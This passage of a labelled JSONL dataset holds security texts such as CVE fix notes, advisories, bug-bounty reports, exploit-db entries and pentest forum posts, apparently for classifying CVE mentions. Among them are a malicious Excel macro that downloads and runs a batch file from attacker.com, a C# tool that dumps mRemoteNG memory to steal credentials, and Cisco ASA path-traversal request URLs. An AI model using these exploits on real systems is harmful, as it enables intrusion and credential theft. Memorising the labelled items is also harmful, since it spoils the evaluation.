found.", "source": "cvefixes", "timestamp": "2022-08-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c1e65eb13e6b2ec8f8f9", "text": "NFORMATION GATHERING - Virtual Hosts\n\nHi! I am stuck for a few days now, and I’m don’t know what I’m doing wrong. The question is: Enumerate the target and find a vHost that contains flag No. 1. Submit the flag value as your answer (in the format HTB{DATA}). When I’m doing FFUF on it, and want to go to for example blog.inlanefreight.htb than everything is the same webpage. The webpage from the Ubuntu Apache page. When i go to HTTP://inlanefreight.htb than I got a flag 1, but when I fill it in, it said that it isn’t the write answer. I added the findings from FFUF to /etc/hosts/ with the given target-ip. Can anyone tell me what I’m doing wrong, please?", "source": "hackthebox", "timestamp": "2022-07-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "adf65d8489e373c82f1c", "text": "CVE: CVE-2022-24771\n\n[{'lang': 'en', 'value': 'Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.'}]\n\nFix commit: Fix signature verification issues.\n\n**SECURITY**: Three RSA PKCS#1 v1.5 signature verification issues were\nreported by Moosa Yahyazadeh (moosa-yahyazadeh@uiowa.edu):\n\n- Leniency in checking `digestAlgorithm` structure can lead to signature\n forgery.\n - The code is lenient in checking the digest algorithm structure. This can\n allow a crafted structure that steals padding bytes and uses unchecked\n portion of the PKCS#1 encoded message to forge a signature when a low\n public exponent is being used.\n- Failing to check tailing garbage bytes can lead to signature forgery.\n - The code does not check for tailing garbage bytes after decoding a\n `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed\n and garbage data added to forge a signature when a low public exponent is\n being used.\n- Leniency in checking type octet.\n - `DigestInfo` is not properly checked for proper ASN.1 structure. This can\n lead to successful verification with signatures that contain invalid\n structures but a valid digest.\n\nFor more information, please see \"Bleichenbacher's RSA signature forgery based\non implementation error\" by Hal Finney:\nhttps://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/\n\nFixed with the following:\n\n- [asn1] `fromDer` is now more strict and will default to ensuring all\n input bytes are parsed or throw an error. A new option `parseAllBytes`\n can disable this behavior.\n - **NOTE**: The previous behavior is being changed since it can lead\n to security issues with crafted inputs. It is possible that code\n doing custom DER parsing may need to adapt to this new behavior and\n optional flag.\n- [rsa] Add and use a validator to check for proper structure of parsed\n ASN.1 `RSASSA-PKCS-v1_5` `DigestInfo` data. Additionally check that\n the hash algorithm identifier is a known value. An invalid\n `DigestInfo` or algorithm identifier will now cause an error to be\n thrown.\n- [oid] Added `1.2.840.113549.2.2` / `md2` for hash algorithm checking.\n- [tests] Tests were added for all of the reported issues. A private\n verify option was added to assist in checking multiple possible\n failures in the test data.", "source": "cvefixes", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8346459f66cf153ed427", "text": "Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)\n\n## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)\n## Author: nu11secur1ty\n## Date: 06.27.2023\n## Vendor: https://www.microsoft.com/\n## Software: https://www.microsoft.com/en-us/microsoft-365/excel\n## Reference: https://portswigger.net/daily-swig/rce\n## CVE-2023-33137\n\n\n## Description:\nThis exploit is connected with third part exploit server, which waits\nfor the victim to call him and execute the content from him using the\npipe posting method! This is absolutely a 0-day exploit! This is\nabsolutely dangerous for the victims, who are infected by him!\nWhen the victim hit the button in the Excel file, it makes a POST\nrequest to the exploit server, and the server is responding back that\nway: He creates another hidden malicious file and executed it directly\non the machine of the victim, then everything is disappeared, so\nnasty.\n\nSTATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users!\n\n[+]Exploit:\n```vbs\nSub AutoOpen()\n Call Shell(\"cmd.exe /S /c\" & \"curl -s\nhttps://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat\n> maloumnici.bat && .\\maloumnici.bat\", vbNormalFocus)\nEnd Sub\n\n```\n\n## Reproduce:\n[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)\n\n## Proof and Exploit:\n[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)\n\n## Time spend:\n01:27:00", "source": "exploitdb", "timestamp": "2023-07-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "05b88613e21a4e09d49e", "text": "Hi, There is the GUI in Applications Menu at the 1st line Privacy, as you mentioned the console was irresponsible I would try the GUI interface instead console. Sound silly but it might make it work smoother as there are other options in the GUI as well.", "source": "parrotsec", "timestamp": "2023-11-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e450c4d06ad13cf2fef2", "text": "I got the same problem Do you remember how to fix it?", "source": "hackthebox", "timestamp": "2023-06-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "607804b5ea1b2cd4e8a0", "text": "Can anyone write to me privately please. I have a question about the optional task and would like to understand it. I have all 5 flags, for info.", "source": "hackthebox", "timestamp": "2023-08-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "68598736f49b02e495ae", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-06-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "eeef9152f9527b1dd8f5", "text": "CVE: CVE-2022-29532\n\n[{'lang': 'en', 'value': 'An issue was discovered in MISP before 2.4.158. There is XSS in the cerebrate view if one administrator puts a javascript: URL in the URL field, and another administrator clicks on it.'}]\n\nFix commit: fix: [security] XSS in cerebrate view\n\n- low probability XSS in the cerebrate view's URL field\n- a malicious administrator could set a javascript: url\n- another administrator would have to click the suspicious looking URL to be affected\n\n- As reported by Dawid Czarnecki of Zigrin Security on behalf of the Luxembourg Army", "source": "cvefixes", "timestamp": "2022-04-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "82a6cb80edeff424eb59", "text": "mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory\n\n# Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory\n# Google Dork: -\n# Date: 21.07.2023\n# Exploit Author: Maximilian Barz\n# Vendor Homepage: https://mremoteng.org/\n# Software Link: https://mremoteng.org/download\n# Version: mRemoteNG <= v1.77.3.1784-NB\n# Tested on: Windows 11\n# CVE : CVE-2023-30367\n\n\n\n\n/*\nMulti-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to\nstore and manage multi-protocol connection configurations to remotely connect to systems.\n\nmRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev\nloads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,\neven if no connection has been established yet. This allows attackers to access contents of configuration files in plain text\nthrough a memory dump and thus compromise user credentials when no custom password encryption key has been set.\nThis also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.\nFull Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper\n*/\n\n\nusing System;\nusing System.Collections;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.IO;\nusing System.Reflection;\nusing System.Runtime.InteropServices;\nusing System.Text;\nusing System.Text.RegularExpressions;\n\n\nnamespace mRemoteNGDumper\n{\npublic static class Program\n{\n\npublic enum MINIDUMP_TYPE\n{\nMiniDumpWithFullMemory = 0x00000002\n}\n\n[StructLayout(LayoutKind.Sequential, Pack = 4)]\npublic struct MINIDUMP_EXCEPTION_INFORMATION\n{\npublic uint ThreadId;\npublic IntPtr ExceptionPointers;\npublic int ClientPointers;\n}\n\n[DllImport(\"kernel32.dll\")]\nstatic extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);\n\n[DllImport(\"Dbghelp.dll\")]\nstatic extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);\n\n\nstatic void Main(string[] args)\n{\nstring input;\nbool configfound = false;\nStringBuilder filesb;\nStringBuilder linesb;\nList configs = new List();\n\nProcess[] localByName = Process.GetProcessesByName(\"mRemoteNG\");\n\nif (localByName.Length == 0) {\nConsole.WriteLine(\"[-] No mRemoteNG process was found. Exiting\");\nSystem.Environment.Exit(1);\n}\nstring assemblyPath = Assembly.GetEntryAssembly().Location;\nConsole.WriteLine(\"[+] Creating a memory dump of mRemoteNG using PID {0}.\", localByName[0].Id);\nstring dumpFileName = assemblyPath + \"_\" + DateTime.Now.ToString(\"dd.MM.yyyy.HH.mm.ss\") + \".dmp\";\nFileStream procdumpFileStream = File.Create(dumpFileName);\nMINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();\n\n// A full memory dump is necessary in the case of a managed application, other wise no information\n// regarding the managed code will be available\nMINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;\nMiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);\nprocdumpFileStream.Close();\n\nfilesb = new StringBuilder();\nConsole.WriteLine(\"[+] Searching for configuration files in memory dump.\");\nusing (StreamReader reader = new StreamReader(dumpFileName))\n{\nwhile (reader.Peek() >= 0)\n{\ninput = reader.ReadLine();\nstring pattern = @\"(\\)\\/>\";\nMatch m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);\nif (m.Success)\n{\nconfigfound = true;\n\nforeach (string config in m.Value.Split('>'))\n{\nconfigs.Add(config);\n}\n}\n\n}\n\nreader.Close();\nif (configfound)\n{\nstring currentDir = System.IO.Directory.GetCurrentDirectory();\nstring dumpdir = currentDir + \"/dump\";\nif (!Directory.Exists(dumpdir))\n{\nDirectory.CreateDirectory(dumpdir);\n}\n\nstring savefi", "source": "exploitdb", "timestamp": "2023-07-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e90a30948cdd3261792e", "text": "CVE: CVE-2022-23617\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions any user with edit right can copy the content of a page it does not have access to by using it as template of a new page. This issue has been patched in XWiki 13.2CR1 and 12.10.6. Users are advised to update. There are no known workarounds for this issue.'}]\n\nFix commit: XWIKI-18430: Wrong handling of template documents\n* improve retro compatibility with future 12.10.x versions", "source": "cvefixes", "timestamp": "2022-02-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9bd02a2c82e9f076d55b", "text": "Looking For Advice\n\nI guess a little back story info would be in order. I’m a pastor of 2 very small congregations in the Upstate of SC. I don’t take a salary (obviously out of the question due to the size). I pay my bills driving an 18 wheeler that allows me to be home every night and all weekend long. I was diagnosed with macular degeneration in my right eye and it’s beginning to seriously affect my vision. I have a DOT card that is good for 1 year so that gives me a little less than a year to prepare myself for a new career. Realistically, what skills do you believe I could develop in a year’s time that would make me marketable breaking into the IT field? I’m a 48 year old male with a little above average intelligence but certainly not super intelligent. I’ve been using various Linux distros for 12 years or so. Ideally I would like to be self employed but even remote working would be acceptable. I’m about an hour and a half south of Charlotte NC and 3 hours from Atlanta GA. Thanks.", "source": "parrotsec", "timestamp": "2022-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "daba7632e9f9ed83ca26", "text": "for some reason you need to append the leaked address at the payload i just tried it and it works i don’t know the reason why", "source": "hackthebox", "timestamp": "2023-05-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bd9310ff44334de54df1", "text": "Rancher Webhook is misconfigured during upgrade process\n\n[Severity: CRITICAL]\n\n### Impact\n\nA failure in the update logic of Rancher's admission Webhook may lead to the misconfiguration of the Webhook. This component enforces validation rules and security checks before resources are admitted into the Kubernetes cluster.\n\nWhen the Webhook is operating in a degraded state, it no longer validates any resources, which may result in severe privilege escalations and data corruption.\n\nThe issue only affects users that upgrade from `2.6.x` or `2.7.x` to `2.7.2`. Users that did a fresh install of 2.7.2 (and did not follow an upgrade path) are not affected.\n\nThe command below can be executed on the `local` cluster to determine whether the cluster is affected by this issue:\n\n```sh\n$ kubectl get validatingwebhookconfigurations.admissionregistration.k8s.io rancher.cattle.io\n\nNAME WEBHOOKS AGE\nrancher.cattle.io 0 19h\n```\n\nIf the resulting webhook quantity is `0`, the Rancher instance is affected.\n\n### Patches\n\nPatched versions include release `2.7.3` and later versions.\n\n### Workarounds\n\nIf you are affected and cannot update to a patched Rancher version, the recommended workaround is to manually reconfigure the Webhook with the script below. Please note that the script must be run from inside the `local` cluster or with a kubeconfig pointing to the `local` cluster which has admin permissions.\n\n```yaml\n#!/bin/bash\n\nset -euo pipefail\n\nfunction prereqs() {\n if ! [ -x \"$(command -v kubectl)\" ]; then\n echo \"error: kubectl is not installed.\" >&2\n exit 1\n fi\n\n if [[ -z \"$(kubectl config view -o jsonpath='{.clusters[].cluster.server}')\" ]]; then\n echo \"error: No kubernetes cluster found on kubeconfig.\" >&2\n exit 1\n fi\n}\n\nfunction restart_deployment(){\n kubectl rollout restart deployment rancher-webhook -n cattle-system\n kubectl rollout status deployment rancher-webhook -n cattle-system --timeout=30s\n}\n\nfunction workaround() {\n echo \"Cluster: $(kubectl config view -o jsonpath='{.clusters[].cluster.server}')\"\n\n if ! kubectl get validatingwebhookconfigurations.admissionregistration.k8s.io rancher.cattle.io > /dev/null 2>&1; then\n echo \"webhook rancher.cattle.io not found, restarting deployment:\"\n restart_deployment\n\n echo \"waiting for webhook configuration\"\n sleep 15s\n fi\n\n local -i webhooks\n webhooks=\"$(kubectl get validatingwebhookconfigurations.admissionregistration.k8s.io rancher.cattle.io --no-headers | awk '{ print $2 }')\"\n\n if [ \"${webhooks}\" == \"0\" ]; then\n echo \"Webhook misconfiguration status: Cluster is affected by CVE-2023-22651\"\n \n echo \"Running workaround:\"\n kubectl delete validatingwebhookconfiguration rancher.cattle.io\n restart_deployment\n\n ret=$?\n if [ $ret -eq 0 ]; then\n echo \"Webhook restored, CVE-2023-22651 is fixed\"\n else\n echo \"error trying to restart deployment. try again in a few seconds.\"\n fi\n else\n echo \"Webhook misconfiguration status: not present (skipping)\"\n fi\n\n echo \"Done\"\n}\n\nfunction main() {\n prereqs\n workaround\n}\n\nmain\n```\n\n### References\n- https://github.com/rancher/webhook/pull/216/commits/a4a498613b43a3ee93c5ab06742a3bc8adace45d\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n- Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries.\n- Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.\n- Verify our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).", "source": "github_advisory", "timestamp": "2023-04-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3a906351222eb5447500", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-07-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "59fa5c35e5b6361991c4", "text": "Don’t know if you figured it out but I ran into the same problem and I fixed it by specifying a rule on Defender firewall to specifically allow inbound traffic on TCP port 445, which the default port for smbclient.", "source": "hackthebox", "timestamp": "2023-07-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f8e6924a1ccd6f388bf8", "text": "CVE: CVE-2022-1931\n\n[{'lang': 'en', 'value': 'Incorrect Synchronization in GitHub repository polonel/trudesk prior to 1.2.3.'}]\n\nFix commit: fix(messages): validation check", "source": "cvefixes", "timestamp": "2022-05-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0a7fa4b1ebf2e401c5a7", "text": "CVE: CVE-2022-0278\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: xss on contact form fix", "source": "cvefixes", "timestamp": "2022-01-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e38356249b0863c8aee4", "text": "Alkacon OpenCMS XSS via searchfilter parameter in system/workplace/admin/workplace/sessions.jsp\n\n[Severity: LOW]\n\nCross-site scripting (XSS) vulnerability in system/workplace/admin/workplace/sessions.jsp in Alkacon OpenCMS 7.0.3 allows remote attackers to inject arbitrary web script or HTML via the searchfilter parameter, a different vector than CVE-2008-1510.", "source": "github_advisory", "timestamp": "2022-05-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "bbbae09b015d06fe17d0", "text": "CVE: CVE-2022-33146\n\n[{'lang': 'en', 'value': 'Open redirect vulnerability in web2py versions prior to 2.22.5 allows a remote attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having a user to access a specially crafted URL.'}]\n\nFix commit: added validation of send attribute in admin", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e1b7bb037841e2acb9c5", "text": "Hi, I hope someone can give me a hint on this. I’m stuck, I am able to run the code that @XSSDoctor shared, but when running with loader.py the values from $rdx , the only thing I get is a red dollar sign as if it’s a shell, and then when I write any command ( whoami , ls ) goes back to my system prompt, and even the result of echo $? is 0 , so it ran correctly. I don’t know if my shellcode is not correctly formatted, I’m hard stuck. I would appreciate any help, DM me if required.", "source": "hackthebox", "timestamp": "2023-10-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "dae9747cb8f1e4fe5c27", "text": "Apt list --installed | wc When I tried to enter -1 or -| The system didn’t recognize the command Edit: (in the next section, the specify it as “-l” AKA lowercase L. Didn’t get to try that one) The output also listed 3 numbers: 738 2949 55881 Subtracted 1 from the first number and got the answer, though I still don’t know why 3 numbers were listed. Also, I’d love to know how to use this information in a theoretical attack", "source": "hackthebox", "timestamp": "2023-02-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4191b505d4fcb59d63e6", "text": "[Path Traversal] CVE-2020-3452 on https://█████/\n\nHello team,\nI hope you're doing well, healthy & wealthy.\n\nI found a CVE-2020-3452 path traversal and here is the explanation.\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## References\n\n - https://twitter.com/aboul3la/status/1286012324722155525\n - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html\n - http://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html\n - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html\n - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n ** classification:**\n- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n- cvss-score: 7.50\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\nCisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nPlease do this GET request below.\n\n- https://████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\nSecond attack type:\n\n- https://██████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n\nYou can see the file can be downloaded.\n\n## Suggested Mitigation/Remediation Actions\nPlease upgrade to the latest version of the software.\n\nBest regards.\n@pirneci", "source": "hackerone", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f118143aa9e2583db81a", "text": "Good Morning, Apollyon!!! I just wanted to let you know after reading post and comments, I decided to send a request to join your team. ( either d4rk3m0 or JTCHD007 ) I am still fairly to the community and I have never been in an ( Actually team ) before. I am looking forward to joining the team! if you have any questions, do not hesitate to DM me -JTCHD", "source": "hackthebox", "timestamp": "2022-09-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "081ff65960e5b602cae5", "text": "CVE: CVE-2022-31003\n\n[{'lang': 'en', 'value': 'Sofia-SIP is an open-source Session Initiation Protocol (SIP) User-Agent library. Prior to version 1.13.8, when parsing each line of a sdp message, `rest = record + 2` will access the memory behind `\\\\0` and cause an out-of-bounds write. An attacker can send a message with evil sdp to FreeSWITCH, causing a crash or more serious consequence, such as remote code execution. Version 1.13.8 contains a patch for this issue.'}]\n\nFix commit: Merge pull request from GHSA-8w5j-6g2j-pxcp\n\nFix Heap-buffer-overflow in parse_descs and parse_message", "source": "cvefixes", "timestamp": "2022-05-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0d5d59be8fe390ac3768", "text": "Red Team Training, C2 frameworks?\n\nCan we do in Caldera, what we can do with Empire? Caldera can do more, but can Caldera be used instead of Empire? Like ZAP can do what Burp can, and vice versa.", "source": "hackersploit", "timestamp": "2022-04-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "75f5d0f505fccaa13160", "text": "I am unable to get the flag.txt. I’ve tried to copy it: Click to reveal spoiler I’ve tried to cat it: Click to reveal spoiler I’ve tried to move it but got a permissions error. I’ve managed to print the error on the page itself when I put the payloads in the “to” field instead of the from field but it still does not print the flag I’ve tried many variations of these payloads but none are working. I’ve been stuck on this for 3 days now. Any assistance will be appreciated.", "source": "hackthebox", "timestamp": "2023-10-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "01686f49636630ad5def", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects ChakraCore. This CVE ID is unique from CVE-2018-0943, CVE-2018-8130, CVE-2018-8133, CVE-2018-8145.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "98b04f5591ca99ea2f3e", "text": "CVE: CVE-2022-0282\n\n[{'lang': 'en', 'value': 'Code Injection in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: fix comments xss", "source": "cvefixes", "timestamp": "2022-01-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "413daf3682023dc113e0", "text": "CVE: CVE-2022-1543\n\n[{'lang': 'en', 'value': 'Improper handling of Length parameter in GitHub repository erudika/scoold prior to 1.49.4. When the text size is large enough the service results in a momentary outage in a production environment. That can lead to memory corruption on the server.'}]\n\nFix commit: fixed profile name not limited in length", "source": "cvefixes", "timestamp": "2022-04-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "93a1a50b917feffe08dd", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft Edge, aka \"Scripting Engine Memory Corruption Vulnerability.\" This CVE ID is unique from CVE-2017-0228, CVE-2017-0229, CVE-2017-0230, CVE-2017-0234, CVE-2017-0235, CVE-2017-0236, and CVE-2017-0238.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9bea22eddf29c0cf8e76", "text": "[Authentication Bypass by Primary Weakness] CVE-2023-27535: FTP too eager connection reuse\n\n## Summary:\nlibcurl FTP(S) protocol will reuse connection even if different `CURLOPT_FTP_ACCOUNT` (libcurl) or `--ftp-account` (curl) is specified for different connections and the server requests account authentication via reply code `332`. It appears that `STRING_FTP_ALTERNATIVE_TO_USER ` (libcurl) or `--ftp-alternative-to-user` (curl) is also affected and should also result in caching being refused.\n\n## Steps To Reproduce:\n\n 1. terminal 1: `echo -e \"foo\\n\" | nc -v -l -p 9998; echo -e \"bar\\n\" | nc -v -l -p 9998`\n 2. terminal 2: `echo -ne \"220 a\\n331 b\\n332 c\\n230 d\\n257 \\\"/\\\"\\n229 (|||9998|)\\n200 e\\n213 4\\n150 f\\n226 g\\n229 (|||9998|)\\n213 4\\n150 f\\n226 g\\n\" | nc -v -l -p 9999`\n 3. terminal 3: `curl -v --ftp-account alice \"ftp://ftp@server:9999/file1\" -: --ftp-account bob \"ftp://ftp@server:9999/file2\"`\n\nAs a result connection authenticated as user `alice` will be used when fetching `file2` regardless that user `bob` was specified for fetching it.\n\n## Remediation\n* Don't reuse connection if `CURLOPT_FTP_ACCOUNT` or `STRING_FTP_ALTERNATIVE_TO_USER` are different.\n\n## Supporting Material/References:\n* https://www.ietf.org/rfc/rfc0959.txt\n\n## Impact\n\nAccessing content with wrong cached credentials.", "source": "hackerone", "timestamp": "2023-03-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "34c5f515b5719a394107", "text": "CVE: CVE-2021-45943\n\n[{'lang': 'en', 'value': 'GDAL 3.3.0 through 3.4.0 has a heap-based buffer overflow in PCIDSK::CPCIDSKFile::ReadFromFile (called from PCIDSK::CPCIDSKSegment::ReadFromFile and PCIDSK::CPCIDSKBinarySegment::CPCIDSKBinarySegment).'}]\n\nFix commit: Merge pull request #4944 from rouault/fix_ossfuzz_41993\n\nPCIDSK: fix write heap-buffer-overflow. Fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=41993", "source": "cvefixes", "timestamp": "2022-01-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "df79cfab8fe493fac3a4", "text": "StationX – 1 May 20 Nmap Cheat Sheet Example IDS Evasion command", "source": "hackersploit", "timestamp": "2022-04-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d274cdd2eadf6553ef63", "text": "Thanks @n0manarmy . I was getting the reverse shell as “htb-student”. Then I ran “./leave_msg $( python -c…)” and in the end I got the reverse shell as root", "source": "hackthebox", "timestamp": "2023-03-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9c298144ecf420401a8f", "text": "image 834×496 197 KB I’m not sure, why am I not able to ssh into htb-student?", "source": "hackthebox", "timestamp": "2023-12-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c29fda1f84202682a00a", "text": "CVE: CVE-2022-23597\n\n[{'lang': 'en', 'value': \"Element Desktop is a Matrix client for desktop platforms with Element Web at its core. Element Desktop before 1.9.7 is vulnerable to a remote program execution bug with user interaction. The exploit is non-trivial and requires clicking on a malicious link, followed by another button click. To the best of our knowledge, the vulnerability has never been exploited in the wild. If you are using Element Desktop < 1.9.7, we recommend upgrading at your earliest convenience. If successfully exploited, the vulnerability allows an attacker to specify a file path of a binary on the victim's computer which then gets executed. Notably, the attacker does *not* have the ability to specify program arguments. However, in certain unspecified configurations, the attacker may be able to specify an URI instead of a file path which then gets handled using standard platform mechanisms. These may allow exploiting further vulnerabilities in those mechanisms, potentially leading to arbitrary code execution.\"}]\n\nFix commit: Merge pull request from GHSA-mjrg-9f8r-h3m7\n\n* Patch part 1: remove electronVersion\n\nWe no longer need to specify electronVersion at all since electron\nis now in devDependencies. Removing it means electron can be updated\nthe same way as any other dependency.\n\n* Only allow main app page to be opened via URL\n\nWe previously allowed any URL to be opened in the main electron\nwindow. Allow only the main app page, as commented.\n\n* use exact equals\n\n* Make url logic clearer", "source": "cvefixes", "timestamp": "2022-02-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "bb0482cf9259654eff54", "text": "maybee somebody can help me ? i try move some file to tmp directory, but always have an error (((", "source": "hackthebox", "timestamp": "2022-01-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0808994fcf35892776cc", "text": "+1 for me. I tried ``` dpkg --list | wc --lines which gave me 748. Im not sure what the difference is.", "source": "hackthebox", "timestamp": "2023-03-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b6342bb7d3f75d11d966", "text": "Who has experience with Bloodhound?\n\nG’Day, Hackersploit Community! I’m a cybersecurity researcher conducting a study on the use of Bloodhound in 